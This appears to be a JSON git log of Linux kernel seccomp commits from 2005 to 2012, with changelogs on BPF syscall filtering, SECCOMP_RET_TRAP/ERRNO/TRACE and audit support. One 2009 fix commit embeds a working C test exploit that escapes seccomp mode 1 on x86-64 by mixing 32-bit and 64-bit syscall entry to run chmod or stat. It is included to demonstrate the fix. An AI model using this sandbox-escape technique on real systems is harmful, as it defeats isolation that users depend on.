)]}' { "log": [ { "commit": "87b526d349b04c31d7b3a40b434eb3f825d22305", "tree": "2aeec0465901c9623ef7f5b3eb451ea6ccce6ecc", "parents": [ "bf5308344527d015ac9a6d2bda4ad4d40fd7d943" ], "author": { "name": "Andy Lutomirski", "email": "luto@amacapital.net", "time": "Mon Oct 01 11:40:45 2012 -0700" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Tue Oct 02 21:14:29 2012 +1000" }, "message": "seccomp: Make syscall skipping and nr changes more consistent\n\nThis fixes two issues that could cause incompatibility between\nkernel versions:\n\n - If a tracer uses SECCOMP_RET_TRACE to select a syscall number\n higher than the largest known syscall, emulate the unknown\n vsyscall by returning -ENOSYS. (This is unlikely to make a\n noticeable difference on x86-64 due to the way the system call\n entry works.)\n\n - On x86-64 with vsyscall\u003demulate, skipped vsyscalls were buggy.\n\nThis updates the documentation accordingly.\n\nSigned-off-by: Andy Lutomirski \u003cluto@amacapital.net\u003e\nAcked-by: Will Drewry \u003cwad@chromium.org\u003e\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "8156b451f37898d3c3652b4e988a4d62ae16eaac", "tree": "e310c816de65d28f5b5ecf75bc890ccc8a2c2514", "parents": [ "e4da89d02f369450996cfd04f64b1cce4d8afaea" ], "author": { "name": "Will Drewry", "email": "wad@chromium.org", "time": "Tue Apr 17 14:48:58 2012 -0500" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Wed Apr 18 12:24:52 2012 +1000" }, "message": "seccomp: fix build warnings when there is no CONFIG_SECCOMP_FILTER\n\nIf both audit and seccomp filter support are disabled, \u0027ret\u0027 is marked\nas unused.\n\nIf just seccomp filter support is disabled, data and skip are considered\nunused.\n\nThis change fixes those build warnings.\n\nReported-by: Stephen Rothwell \u003csfr@canb.auug.org.au\u003e\nSigned-off-by: Will Drewry \u003cwad@chromium.org\u003e\nAcked-by: Kees Cook \u003ckeescook@chromium.org\u003e\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "fb0fadf9b213f55ca9368f3edafe51101d5d2deb", "tree": "e3e999f0b44a7b4a08b208ae222f509917fc675b", "parents": [ "bb6ea4301a1109afdacaee576fedbfcd7152fc86" ], "author": { "name": "Will Drewry", "email": "wad@chromium.org", "time": "Thu Apr 12 16:48:02 2012 -0500" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Sat Apr 14 11:13:21 2012 +1000" }, "message": "ptrace,seccomp: Add PTRACE_SECCOMP support\n\nThis change adds support for a new ptrace option, PTRACE_O_TRACESECCOMP,\nand a new return value for seccomp BPF programs, SECCOMP_RET_TRACE.\n\nWhen a tracer specifies the PTRACE_O_TRACESECCOMP ptrace option, the\ntracer will be notified, via PTRACE_EVENT_SECCOMP, for any syscall that\nresults in a BPF program returning SECCOMP_RET_TRACE. The 16-bit\nSECCOMP_RET_DATA mask of the BPF program return value will be passed as\nthe ptrace_message and may be retrieved using PTRACE_GETEVENTMSG.\n\nIf the subordinate process is not using seccomp filter, then no\nsystem call notifications will occur even if the option is specified.\n\nIf there is no tracer with PTRACE_O_TRACESECCOMP when SECCOMP_RET_TRACE\nis returned, the system call will not be executed and an -ENOSYS errno\nwill be returned to userspace.\n\nThis change adds a dependency on the system call slow path. Any future\nefforts to use the system call fast path for seccomp filter will need to\naddress this restriction.\n\nSigned-off-by: Will Drewry \u003cwad@chromium.org\u003e\nAcked-by: Eric Paris \u003ceparis@redhat.com\u003e\n\nv18: - rebase\n - comment fatal_signal check\n - acked-by\n - drop secure_computing_int comment\nv17: - ...\nv16: - update PT_TRACE_MASK to 0xbf4 so that STOP isn\u0027t clear on SETOPTIONS call (indan@nul.nu)\n [note PT_TRACE_MASK disappears in linux-next]\nv15: - add audit support for non-zero return codes\n - clean up style (indan@nul.nu)\nv14: - rebase/nochanges\nv13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc\n (Brings back a change to ptrace.c and the masks.)\nv12: - rebase to linux-next\n - use ptrace_event and update arch/Kconfig to mention slow-path dependency\n - drop all tracehook changes and inclusion (oleg@redhat.com)\nv11: - invert the logic to just make it a PTRACE_SYSCALL accelerator\n (indan@nul.nu)\nv10: - moved to PTRACE_O_SECCOMP / PT_TRACE_SECCOMP\nv9: - n/a\nv8: - guarded PTRACE_SECCOMP use with an ifdef\nv7: - introduced\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "bb6ea4301a1109afdacaee576fedbfcd7152fc86", "tree": "5412219057d8e0ec2a30d0a1ad4f6b7dd398c754", "parents": [ "a0727e8ce513fe6890416da960181ceb10fbfae6" ], "author": { "name": "Will Drewry", "email": "wad@chromium.org", "time": "Thu Apr 12 16:48:01 2012 -0500" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Sat Apr 14 11:13:21 2012 +1000" }, "message": "seccomp: Add SECCOMP_RET_TRAP\n\nAdds a new return value to seccomp filters that triggers a SIGSYS to be\ndelivered with the new SYS_SECCOMP si_code.\n\nThis allows in-process system call emulation, including just specifying\nan errno or cleanly dumping core, rather than just dying.\n\nSuggested-by: Markus Gutschke \u003cmarkus@chromium.org\u003e\nSuggested-by: Julien Tinnes \u003cjln@chromium.org\u003e\nSigned-off-by: Will Drewry \u003cwad@chromium.org\u003e\nAcked-by: Eric Paris \u003ceparis@redhat.com\u003e\n\nv18: - acked-by, rebase\n - don\u0027t mention secure_computing_int() anymore\nv15: - use audit_seccomp/skip\n - pad out error spacing; clean up switch (indan@nul.nu)\nv14: - n/a\nv13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc\nv12: - rebase on to linux-next\nv11: - clarify the comment (indan@nul.nu)\n - s/sigtrap/sigsys\nv10: - use SIGSYS, syscall_get_arch, updates arch/Kconfig\n note suggested-by (though original suggestion had other behaviors)\nv9: - changes to SIGILL\nv8: - clean up based on changes to dependent patches\nv7: - introduction\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "acf3b2c71ed20c53dc69826683417703c2a88059", "tree": "99ced75da46a0ab7953f0c173dd885c09f570fc0", "parents": [ "3dc1c1b2d2ed7507ce8a379814ad75745ff97ebe" ], "author": { "name": "Will Drewry", "email": "wad@chromium.org", "time": "Thu Apr 12 16:47:59 2012 -0500" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Sat Apr 14 11:13:21 2012 +1000" }, "message": "seccomp: add SECCOMP_RET_ERRNO\n\nThis change adds the SECCOMP_RET_ERRNO as a valid return value from a\nseccomp filter. Additionally, it makes the first use of the lower\n16-bits for storing a filter-supplied errno. 16-bits is more than\nenough for the errno-base.h calls.\n\nReturning errors instead of immediately terminating processes that\nviolate seccomp policy allow for broader use of this functionality\nfor kernel attack surface reduction. For example, a linux container\ncould maintain a whitelist of pre-existing system calls but drop\nall new ones with errnos. This would keep a logically static attack\nsurface while providing errnos that may allow for graceful failure\nwithout the downside of do_exit() on a bad call.\n\nThis change also changes the signature of __secure_computing. It\nappears the only direct caller is the arm entry code and it clobbers\nany possible return value (register) immediately.\n\nSigned-off-by: Will Drewry \u003cwad@chromium.org\u003e\nAcked-by: Serge Hallyn \u003cserge.hallyn@canonical.com\u003e\nReviewed-by: Kees Cook \u003ckeescook@chromium.org\u003e\nAcked-by: Eric Paris \u003ceparis@redhat.com\u003e\n\nv18: - fix up comments and rebase\n - fix bad var name which was fixed in later revs\n - remove _int() and just change the __secure_computing signature\nv16-v17: ...\nv15: - use audit_seccomp and add a skip label. (eparis@redhat.com)\n - clean up and pad out return codes (indan@nul.nu)\nv14: - no change/rebase\nv13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc\nv12: - move to WARN_ON if filter is NULL\n (oleg@redhat.com, luto@mit.edu, keescook@chromium.org)\n - return immediately for filter\u003d\u003dNULL (keescook@chromium.org)\n - change evaluation to only compare the ACTION so that layered\n errnos don\u0027t result in the lowest one being returned.\n (keeschook@chromium.org)\nv11: - check for NULL filter (keescook@chromium.org)\nv10: - change loaders to fn\n v9: - n/a\n v8: - update Kconfig to note new need for syscall_set_return_value.\n - reordered such that TRAP behavior follows on later.\n - made the for loop a little less indent-y\n v7: - introduced\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "3dc1c1b2d2ed7507ce8a379814ad75745ff97ebe", "tree": "68ca991b7a3d2fc7623f6d86ba5827d6638974fd", "parents": [ "e2cfabdfd075648216f99c2c03821cf3f47c1727" ], "author": { "name": "Kees Cook", "email": "keescook@chromium.org", "time": "Thu Apr 12 16:47:58 2012 -0500" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Sat Apr 14 11:13:20 2012 +1000" }, "message": "seccomp: remove duplicated failure logging\n\nThis consolidates the seccomp filter error logging path and adds more\ndetails to the audit log.\n\nSigned-off-by: Will Drewry \u003cwad@chromium.org\u003e\nSigned-off-by: Kees Cook \u003ckeescook@chromium.org\u003e\nAcked-by: Eric Paris \u003ceparis@redhat.com\u003e\n\nv18: make compat\u003d permanent in the record\nv15: added a return code to the audit_seccomp path by wad@chromium.org\n (suggested by eparis@redhat.com)\nv*: original by keescook@chromium.org\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "e2cfabdfd075648216f99c2c03821cf3f47c1727", "tree": "d207e062d5b0bbd421aace9f7dfdc144aab4ed18", "parents": [ "b7456536cf9466b402b540c5588d79a4177c723a" ], "author": { "name": "Will Drewry", "email": "wad@chromium.org", "time": "Thu Apr 12 16:47:57 2012 -0500" }, "committer": { "name": "James Morris", "email": "james.l.morris@oracle.com", "time": "Sat Apr 14 11:13:20 2012 +1000" }, "message": "seccomp: add system call filtering using BPF\n\n[This patch depends on luto@mit.edu\u0027s no_new_privs patch:\n https://lkml.org/lkml/2012/1/30/264\n The whole series including Andrew\u0027s patches can be found here:\n https://github.com/redpig/linux/tree/seccomp\n Complete diff here:\n https://github.com/redpig/linux/compare/1dc65fed...seccomp\n]\n\nThis patch adds support for seccomp mode 2. Mode 2 introduces the\nability for unprivileged processes to install system call filtering\npolicy expressed in terms of a Berkeley Packet Filter (BPF) program.\nThis program will be evaluated in the kernel for each system call\nthe task makes and computes a result based on data in the format\nof struct seccomp_data.\n\nA filter program may be installed by calling:\n struct sock_fprog fprog \u003d { ... };\n ...\n prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, \u0026fprog);\n\nThe return value of the filter program determines if the system call is\nallowed to proceed or denied. If the first filter program installed\nallows prctl(2) calls, then the above call may be made repeatedly\nby a task to further reduce its access to the kernel. All attached\nprograms must be evaluated before a system call will be allowed to\nproceed.\n\nFilter programs will be inherited across fork/clone and execve.\nHowever, if the task attaching the filter is unprivileged\n(!CAP_SYS_ADMIN) the no_new_privs bit will be set on the task. This\nensures that unprivileged tasks cannot attach filters that affect\nprivileged tasks (e.g., setuid binary).\n\nThere are a number of benefits to this approach. A few of which are\nas follows:\n- BPF has been exposed to userland for a long time\n- BPF optimization (and JIT\u0027ing) are well understood\n- Userland already knows its ABI: system call numbers and desired\n arguments\n- No time-of-check-time-of-use vulnerable data accesses are possible.\n- system call arguments are loaded on access only to minimize copying\n required for system call policy decisions.\n\nMode 2 support is restricted to architectures that enable\nHAVE_ARCH_SECCOMP_FILTER. In this patch, the primary dependency is on\nsyscall_get_arguments(). The full desired scope of this feature will\nadd a few minor additional requirements expressed later in this series.\nBased on discussion, SECCOMP_RET_ERRNO and SECCOMP_RET_TRACE seem to be\nthe desired additional functionality.\n\nNo architectures are enabled in this patch.\n\nSigned-off-by: Will Drewry \u003cwad@chromium.org\u003e\nAcked-by: Serge Hallyn \u003cserge.hallyn@canonical.com\u003e\nReviewed-by: Indan Zupancic \u003cindan@nul.nu\u003e\nAcked-by: Eric Paris \u003ceparis@redhat.com\u003e\nReviewed-by: Kees Cook \u003ckeescook@chromium.org\u003e\n\nv18: - rebase to v3.4-rc2\n - s/chk/check/ (akpm@linux-foundation.org,jmorris@namei.org)\n - allocate with GFP_KERNEL|__GFP_NOWARN (indan@nul.nu)\n - add a comment for get_u32 regarding endianness (akpm@)\n - fix other typos, style mistakes (akpm@)\n - added acked-by\nv17: - properly guard seccomp filter needed headers (leann@ubuntu.com)\n - tighten return mask to 0x7fff0000\nv16: - no change\nv15: - add a 4 instr penalty when counting a path to account for seccomp_filter\n size (indan@nul.nu)\n - drop the max insns to 256KB (indan@nul.nu)\n - return ENOMEM if the max insns limit has been hit (indan@nul.nu)\n - move IP checks after args (indan@nul.nu)\n - drop !user_filter check (indan@nul.nu)\n - only allow explicit bpf codes (indan@nul.nu)\n - exit_code -\u003e exit_sig\nv14: - put/get_seccomp_filter takes struct task_struct\n (indan@nul.nu,keescook@chromium.org)\n - adds seccomp_chk_filter and drops general bpf_run/chk_filter user\n - add seccomp_bpf_load for use by net/core/filter.c\n - lower max per-process/per-hierarchy: 1MB\n - moved nnp/capability check prior to allocation\n (all of the above: indan@nul.nu)\nv13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc\nv12: - added a maximum instruction count per path (indan@nul.nu,oleg@redhat.com)\n - removed copy_seccomp (keescook@chromium.org,indan@nul.nu)\n - reworded the prctl_set_seccomp comment (indan@nul.nu)\nv11: - reorder struct seccomp_data to allow future args expansion (hpa@zytor.com)\n - style clean up, @compat dropped, compat_sock_fprog32 (indan@nul.nu)\n - do_exit(SIGSYS) (keescook@chromium.org, luto@mit.edu)\n - pare down Kconfig doc reference.\n - extra comment clean up\nv10: - seccomp_data has changed again to be more aesthetically pleasing\n (hpa@zytor.com)\n - calling convention is noted in a new u32 field using syscall_get_arch.\n This allows for cross-calling convention tasks to use seccomp filters.\n (hpa@zytor.com)\n - lots of clean up (thanks, Indan!)\n v9: - n/a\n v8: - use bpf_chk_filter, bpf_run_filter. update load_fns\n - Lots of fixes courtesy of indan@nul.nu:\n -- fix up load behavior, compat fixups, and merge alloc code,\n -- renamed pc and dropped __packed, use bool compat.\n -- Added a hidden CONFIG_SECCOMP_FILTER to synthesize non-arch\n dependencies\n v7: (massive overhaul thanks to Indan, others)\n - added CONFIG_HAVE_ARCH_SECCOMP_FILTER\n - merged into seccomp.c\n - minimal seccomp_filter.h\n - no config option (part of seccomp)\n - no new prctl\n - doesn\u0027t break seccomp on systems without asm/syscall.h\n (works but arg access always fails)\n - dropped seccomp_init_task, extra free functions, ...\n - dropped the no-asm/syscall.h code paths\n - merges with network sk_run_filter and sk_chk_filter\n v6: - fix memory leak on attach compat check failure\n - require no_new_privs || CAP_SYS_ADMIN prior to filter\n installation. (luto@mit.edu)\n - s/seccomp_struct_/seccomp_/ for macros/functions (amwang@redhat.com)\n - cleaned up Kconfig (amwang@redhat.com)\n - on block, note if the call was compat (so the # means something)\n v5: - uses syscall_get_arguments\n (indan@nul.nu,oleg@redhat.com, mcgrathr@chromium.org)\n - uses union-based arg storage with hi/lo struct to\n handle endianness. Compromises between the two alternate\n proposals to minimize extra arg shuffling and account for\n endianness assuming userspace uses offsetof().\n (mcgrathr@chromium.org, indan@nul.nu)\n - update Kconfig description\n - add include/seccomp_filter.h and add its installation\n - (naive) on-demand syscall argument loading\n - drop seccomp_t (eparis@redhat.com)\n v4: - adjusted prctl to make room for PR_[SG]ET_NO_NEW_PRIVS\n - now uses current-\u003eno_new_privs\n (luto@mit.edu,torvalds@linux-foundation.com)\n - assign names to seccomp modes (rdunlap@xenotime.net)\n - fix style issues (rdunlap@xenotime.net)\n - reworded Kconfig entry (rdunlap@xenotime.net)\n v3: - macros to inline (oleg@redhat.com)\n - init_task behavior fixed (oleg@redhat.com)\n - drop creator entry and extra NULL check (oleg@redhat.com)\n - alloc returns -EINVAL on bad sizing (serge.hallyn@canonical.com)\n - adds tentative use of \"always_unprivileged\" as per\n torvalds@linux-foundation.org and luto@mit.edu\n v2: - (patch 2 only)\nSigned-off-by: James Morris \u003cjames.l.morris@oracle.com\u003e\n" }, { "commit": "85e7bac33b8d5edafc4e219c7dfdb3d48e0b4e31", "tree": "6a1f178de829d2219a65a8563e12f2c8029d4b13", "parents": [ "16c174bd95cb07c9d0ad3fcd8c70f9cea7214c9d" ], "author": { "name": "Eric Paris", "email": "eparis@redhat.com", "time": "Tue Jan 03 14:23:05 2012 -0500" }, "committer": { "name": "Al Viro", "email": "viro@zeniv.linux.org.uk", "time": "Tue Jan 17 16:16:55 2012 -0500" }, "message": "seccomp: audit abnormal end to a process due to seccomp\n\nThe audit system likes to collect information about processes that end\nabnormally (SIGSEGV) as this may me useful intrusion detection information.\nThis patch adds audit support to collect information when seccomp forces a\ntask to exit because of misbehavior in a similar way.\n\nSigned-off-by: Eric Paris \u003ceparis@redhat.com\u003e\n" }, { "commit": "5b1017404aea6d2e552e991b3fd814d839e9cd67", "tree": "8af3679beab1541d8c77afe28bc261196f03c083", "parents": [ "ccbe495caa5e604b04d5a31d7459a6f6a76a756c" ], "author": { "name": "Roland McGrath", "email": "roland@redhat.com", "time": "Fri Feb 27 23:25:54 2009 -0800" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@linux-foundation.org", "time": "Mon Mar 02 15:41:30 2009 -0800" }, "message": "x86-64: seccomp: fix 32/64 syscall hole\n\nOn x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with\nljmp, and then use the \"syscall\" instruction to make a 64-bit system\ncall. A 64-bit process make a 32-bit system call with int $0x80.\n\nIn both these cases under CONFIG_SECCOMP\u003dy, secure_computing() will use\nthe wrong system call number table. The fix is simple: test TS_COMPAT\ninstead of TIF_IA32. Here is an example exploit:\n\n\t/* test case for seccomp circumvention on x86-64\n\n\t There are two failure modes: compile with -m64 or compile with -m32.\n\n\t The -m64 case is the worst one, because it does \"chmod 777 .\" (could\n\t be any chmod call). The -m32 case demonstrates it was able to do\n\t stat(), which can glean information but not harm anything directly.\n\n\t A buggy kernel will let the test do something, print, and exit 1; a\n\t fixed kernel will make it exit with SIGKILL before it does anything.\n\t*/\n\n\t#define _GNU_SOURCE\n\t#include \u003cassert.h\u003e\n\t#include \u003cinttypes.h\u003e\n\t#include \u003cstdio.h\u003e\n\t#include \u003clinux/prctl.h\u003e\n\t#include \u003csys/stat.h\u003e\n\t#include \u003cunistd.h\u003e\n\t#include \u003casm/unistd.h\u003e\n\n\tint\n\tmain (int argc, char **argv)\n\t{\n\t char buf[100];\n\t static const char dot[] \u003d \".\";\n\t long ret;\n\t unsigned st[24];\n\n\t if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) !\u003d 0)\n\t perror (\"prctl(PR_SET_SECCOMP) -- not compiled into kernel?\");\n\n\t#ifdef __x86_64__\n\t assert ((uintptr_t) dot \u003c (1UL \u003c\u003c 32));\n\t asm (\"int $0x80 # %0 \u003c- %1(%2 %3)\"\n\t : \"\u003da\" (ret) : \"0\" (15), \"b\" (dot), \"c\" (0777));\n\t ret \u003d snprintf (buf, sizeof buf,\n\t\t\t \"result %ld (check mode on .!)\\n\", ret);\n\t#elif defined __i386__\n\t asm (\".code32\\n\"\n\t \"pushl %%cs\\n\"\n\t \"pushl $2f\\n\"\n\t \"ljmpl $0x33, $1f\\n\"\n\t \".code64\\n\"\n\t \"1: syscall # %0 \u003c- %1(%2 %3)\\n\"\n\t \"lretl\\n\"\n\t \".code32\\n\"\n\t \"2:\"\n\t : \"\u003da\" (ret) : \"0\" (4), \"D\" (dot), \"S\" (\u0026st));\n\t if (ret \u003d\u003d 0)\n\t ret \u003d snprintf (buf, sizeof buf,\n\t\t\t \"stat . -\u003e st_uid\u003d%u\\n\", st[7]);\n\t else\n\t ret \u003d snprintf (buf, sizeof buf, \"result %ld\\n\", ret);\n\t#else\n\t# error \"not this one\"\n\t#endif\n\n\t write (1, buf, ret);\n\n\t syscall (__NR_exit, 1);\n\t return 2;\n\t}\n\nSigned-off-by: Roland McGrath \u003croland@redhat.com\u003e\n[ I don\u0027t know if anybody actually uses seccomp, but it\u0027s enabled in\n at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n" }, { "commit": "cf99abace7e07dd8491e7093a9a9ef11d48838ed", "tree": "3b7cfd7c76c2c43e6ae3fdaaff3a50a752072424", "parents": [ "1d9d02feeee89e9132034d504c9a45eeaf618a3d" ], "author": { "name": "Andrea Arcangeli", "email": "andrea@cpushare.com", "time": "Sun Jul 15 23:41:33 2007 -0700" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@woody.linux-foundation.org", "time": "Mon Jul 16 09:05:50 2007 -0700" }, "message": "make seccomp zerocost in schedule\n\nThis follows a suggestion from Chuck Ebbert on how to make seccomp\nabsolutely zerocost in schedule too. The only remaining footprint of\nseccomp is in terms of the bzImage size that becomes a few bytes (perhaps\neven a few kbytes) larger, measure it if you care in the embedded.\n\nSigned-off-by: Andrea Arcangeli \u003candrea@cpushare.com\u003e\nCc: Andi Kleen \u003cak@suse.de\u003e\nSigned-off-by: Andrew Morton \u003cakpm@linux-foundation.org\u003e\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n" }, { "commit": "1d9d02feeee89e9132034d504c9a45eeaf618a3d", "tree": "a4324cce8acd77cace3b1d4cf3a1e61783707e5c", "parents": [ "be0ef957c9eed4ebae873ee3fbcfb9dfde486dec" ], "author": { "name": "Andrea Arcangeli", "email": "andrea@cpushare.com", "time": "Sun Jul 15 23:41:32 2007 -0700" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@woody.linux-foundation.org", "time": "Mon Jul 16 09:05:50 2007 -0700" }, "message": "move seccomp from /proc to a prctl\n\nThis reduces the memory footprint and it enforces that only the current\ntask can enable seccomp on itself (this is a requirement for a\nstrightforward [modulo preempt ;) ] TIF_NOTSC implementation).\n\nSigned-off-by: Andrea Arcangeli \u003candrea@cpushare.com\u003e\nSigned-off-by: Andrew Morton \u003cakpm@linux-foundation.org\u003e\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n" }, { "commit": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "tree": "0bba044c4ce775e45a88a51686b5d9f90697ea9d", "parents": [], "author": { "name": "Linus Torvalds", "email": "torvalds@ppc970.osdl.org", "time": "Sat Apr 16 15:20:36 2005 -0700" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@ppc970.osdl.org", "time": "Sat Apr 16 15:20:36 2005 -0700" }, "message": "Linux-2.6.12-rc2\n\nInitial git repository build. I\u0027m not bothering with the full history,\neven though we have it. We can create a separate \"historical\" git\narchive of that later if we want to, and in the meantime it\u0027s about\n3.2GB when imported into git - space that would just make the early\ngit days unnecessarily complicated, when we don\u0027t have a lot of good\ninfrastructure for it.\n\nLet it rip!\n" } ] }